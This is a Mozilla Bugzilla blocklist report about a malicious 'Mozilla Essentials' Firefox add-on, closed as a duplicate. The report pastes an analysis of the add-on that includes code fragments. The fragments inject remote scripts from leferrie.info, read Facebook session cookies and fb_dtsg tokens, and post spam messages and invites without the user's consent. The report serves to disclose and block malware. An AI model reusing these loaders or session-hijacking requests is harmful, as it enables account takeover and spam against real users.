Closed Bug 728487 Opened 13 years ago Closed 13 years ago

Malicious "Mozilla Essentials" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

Product:
Toolkit
Component:
Blocklist Policy Requests
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 721646

People

(Reporter: mhammell, Unassigned)

Details

Attachments

(1 file)

spacetube.info.output.zip
82.80 KB, application/octet-stream
Details
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 Steps to reproduce: Downloaded add-on from http://spacetube.info/aranha/essentials.xpi Actual results: Report for http://spacetube.info/aranha/essentials.xpi ** Embedded and Remote Files ** chrome.txt chrome.manifest install.txt content/prefman.js content/skin/icon.png content/script-compiler.js content/youtube.js http://leferrie.info/s.js http://leferrie.info/ar.js content/xmlhttprequester.js content/script-compiler-overlay.xul http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul install.rdf ** Embedded Metadata ** em:minVersion="2.0" em:maxVersion="10.*" /> em:name="Mozilla Essentials" em:version="2.0.0" em:creator="Le Peri" em:iconURL="chrome://youtube/content/skin/icon.png" em:description="Mozilla Essentials" em:homepageURL="http://sairama.info" em:updateURL="http://sairama.info/test/update.rdf" em:updateKey="MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrhDV2GSwhgy/KcSSKVXvwlEAwQU... <em:targetApplication RDF:resource="rdf:#$gT6Sx1"/> em:minVersion="2.0" em:maxVersion="10.*" /> em:name="Mozilla Essentials" em:version="2.0.0" em:creator="Le Peri" em:iconURL="chrome://youtube/content/skin/icon.png" em:description="Mozilla Essentials" em:homepageURL="http://sairama.info" <em:targetApplication RDF:resource="rdf:#$gT6Sx1"/> ** Files Loaded ** ...overlay chrome://browser/content/browser.xul chrome://youtube/content/script-com... ...overlay chrome://browser/content/browser.xul chrome://youtube/content/script-com... em:iconURL="chrome://youtube/content/skin/icon.png" 'chrome://youtube/content/youtube.js' ...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s... em:iconURL="chrome://youtube/content/skin/icon.png" ** Remote Javascript Loaded ** ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul <RDF:Description RDF:about="rdf:#$gT6Sx1" <RDF:Description RDF:about="urn:mozilla:install-manifest" em:description="Mozilla Essentials" </RDF:Description> var scriptableStream=Components .classes["@mozilla.org/scriptableinputstream;1"] .getService(Components.interfaces.nsIScriptableInputStream); .classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); scriptableStream.init(input); var str=scriptableStream.read(input.available()); scriptableStream.close(); var script=youtube_gmCompiler.getUrlContents( youtube_gmCompiler.injectScript(script, href, unsafeWin); injectScript: function(script, url, unsafeContentWin) { var sandbox, script, logger, storage, xmlhttpRequester; var storage=new youtube_ScriptStorage(); "(function(){"+script+"})()", e2.fileName=script.filename; function youtube_ScriptStorage() { youtube_ScriptStorage.prototype.setValue = function(name, val) { youtube_ScriptStorage.prototype.getValue = function(name, defVal) { loadScript_you(); function loadScript_you() { var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://leferrie.info/s.js"); function addScript() { var s = document.createElement('script'); s.setAttribute("type", "text/javascript"); s.setAttribute("src", "http://leferrie.info/ar.js"); var a = document.getElementsByTagName('script')[0]; addScript(); // this function gets called by user scripts in content security scope to ...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s... <RDF:Description RDF:about="rdf:#$gT6Sx1" <RDF:Description RDF:about="urn:mozilla:install-manifest" em:description="Mozilla Essentials" </RDF:Description> ** Facebook Paths Accessed ** ...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '... var urlwp = '/ajax/profile/composer.php?__a=1'; var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1"; ...var automessages = new Array('Novo Facebook 2012 na area !!\x0Afacebook.com/phot... ...xei link pro novo perfil FB 2012 :P\x0Afacebook.com/photo.php?fbid=170162876431... var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1"; var urlwp = '/ajax/events/permalink/join.php?__a=1'; var urlwp = '/ajax/events/invite/send/?__a=1'; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); ...open("POST", "/ajax/ufi/modify.php?__a=1"), setRequestHeader("Content-Type", "ap... ** Facebook Cookies Accessed ** var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; ...]['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); ...wp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=... ...nder=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_sou... ...ine=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_sou... ...eader&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&lsd&post_form_id... ...__d=1&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...et_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_sou... ...pst="post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feedback_params="... ** HTTP Requests ** gf = new XMLHttpRequest(); ...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '... var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var http3 = new XMLHttpRequest(); http3.open("POST", url3, true); var httpc = new XMLHttpRequest(); httpc.open("POST", urlc, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); with(newx = new XMLHttpRequest()) ...open("POST", "/ajax/ufi/modify.php?__a=1"), setRequestHeader("Content-Type", "ap... var req = new this.chromeWindow.XMLHttpRequest(); ** All URLs Loaded or Mentioned ** <RDF:RDF xmlns:em="http://www.mozilla.org/2004/em-rdf#" xmlns:NC="http://home.netscape.com/NC-rdf#" xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> em:homepageURL="http://sairama.info" em:updateURL="http://sairama.info/test/update.rdf" // http://www.letitblog.com/code/python/greasemonkey.py.txt // http://greasemonkey.devjavu.com/ var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1"; var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); ... '<center><br><br><br><br><br><img src="http://whos.amung.us/widget/ncosqdqleyjq... s.setAttribute("src", "http://leferrie.info/ar.js"); s.setAttribute("src", "http://leferrie.info/s.js"); ...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul</code></... ...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org... ...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper... <RDF:RDF xmlns:em="http://www.mozilla.org/2004/em-rdf#" xmlns:NC="http://home.netscape.com/NC-rdf#" xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> em:homepageURL="http://sairama.info" Expected results: It should not steal your Facebook cookies and send messages to Facebook without your consent.
Same id as bug 721646.
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: